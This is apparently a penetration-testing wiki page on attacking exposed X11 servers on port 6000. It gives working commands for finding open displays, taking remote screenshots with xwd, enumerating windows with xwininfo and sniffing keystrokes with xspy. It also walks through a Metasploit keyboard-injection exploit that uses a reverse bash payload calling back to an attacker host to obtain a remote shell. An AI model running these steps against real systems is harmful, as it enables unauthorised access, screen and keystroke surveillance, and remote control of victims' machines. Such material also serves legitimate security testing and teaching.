---
description: >-
  The X Window System (X11, or simply X) is a windowing system for bitmap
  displays, common on Unix-like operating systems. X provides the basic
  framework for a GUI environment.
---

# 6000 - X11

## Nmap

Script:

 `x11-access.nse` 

**Host script results**:   
`|_ x11-access: X server access is granted` 

### Sensepost created the following nmap script

[https://github.com/sensepost/x11-active-displays](https://github.com/sensepost/x11-active-displays)

**Usage**

```text
nmap -p6000 <host> --script x11-active-displays.nse
nmap -p6000 <host> --script x11-active-displays.nse --script-args=unsafe=1,dir="/home/<username>/Documents/"
```

**Output**

```text
Host script results:
| x11-active-displays: X server access is granted
|     Active display
|_    Screenshot saved to /tmp/<ip>:<dp>.jpg
Host script results:
| x11-active-displays: X server access is granted
|_    No active display
```

## Metasploit

X11 No-Auth Scanner - Module scans for X11 servers that allow anyone to connect without authentication. 

`auxiliary/scanner/x11/open_x11` 

## Connect to X11 server

**Xorg:**

`sudo Xorg -terminate -query $REMOTE_HOST :1` 

**Using X:** 

`X :1 -query s390vm.example.com`

* To exit press 'ctrl+alt+enter' 

**To enable XDMCP in Remmina run the following:** 

`sudo apt-get install remmina-plugin-xdmcp` 

## **Taking screenshot**

### **xwd**

XWD It is an X Window System utility that helps in taking screenshots. On our Kali System, we will use the xwd to take the screenshot of Xserver. This utility takes the screenshots in xwd format. 

To take a screenshot run: 

`xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd` 

Here we have the screenshot captured by the xwd, but it is in .xwd format, so to view it we will have to convert it to a viewable format like .png 

**Note:** You may need to install `imagemagick` to convert to png, `convert` is not pre installed on kali

`convert screenshot.xwd screenshot.png` 

On opening the png file we can see that the xwd tool has successfully captured the screenshot of the target system. 

### **xrdp** 

```text
iron@kali2:/opt/xrdp$ python xrdp.py 192.168.0.62:0 
              _        
__  ___ __ __| |_ __   
\ \/ / '__/ _` | '_ \  
 >  <| | | (_| | |_) | 
/_/\_\_|  \__,_| .__/  
               |_|     
X11 Remote Desktop 
xrdp.py <host>:<dp> 
------------------------ 
Example: 
xrdp.py 10.0.0.10:0 
xrdp.py 10.0.0.10:0 --no-disp 
```

## **Gaining remote shell**

 we will use the X11 Keyboard Command Injection module of the Metasploit Framework. This module exploits open X11 Server by connecting and registering a virtual keyboard. Then the Virtual Keyboard is used to open an xterm or gnome-terminal and then type and execute the payload. 

NOTE: As X Server is a visual service, while the executing of the module will take place, every task occurring on the Target System will be visible to the Victim. 

Now, after opening the Metasploit Framework, we will use the payload as shown:

```text
use unix/x11/x11_keyboard_exec 
msf exploit(unix/x11x11_keyboard_exec) > set rhost 192.168.1.109 
msf exploit(unix/x11x11_keyboard_exec) > set payload cmd/unix/reverse_bash 
msf exploit(unix/x11x11_keyboard_exec) > set lhost 192.168.1.120 
msf exploit(unix/x11x11_keyboard_exec) > set lport 4444 
msf exploit(unix/x11x11_keyboard_exec) > set time_wait 10 
msf exploit(unix/x11x11_keyboard_exec) >  run 
```

After running the module, it will first connect to the Server and search for xterm and open it. Then after waiting for 10 seconds as its the wait time we gave earlier, it will start typing the script command on the xterm, After executing this command, xterm will get closed, but it will provide a command shell to the Attacker. 

## **Gather information on the windows open** 

XWININFO - This is the built-in utility in Kali, it shows the window’s information for X Service. xwininfo can be used to get information about the windows opened on the target system. 

`xwininfo -root -tree -display 192.168.1.109:0`

* Root = specifies that X’s root window is the target window 
* Tree = displays the names of the windows 
* Display = specify the server to connect to 

We can extract much information from the screenshot like: 

* The victim has Gnome Terminal Opened 
* The victim is a VMware user 
* The victim has Nautilus \(Ubuntu File Browser\) Opened 

## **Capture keystrokes** 

XSPY It is a built-in tool Kali Linux for the X Window Servers. XSPY is a sniffer, it sniffs keystrokes on the remote or local X Server. 

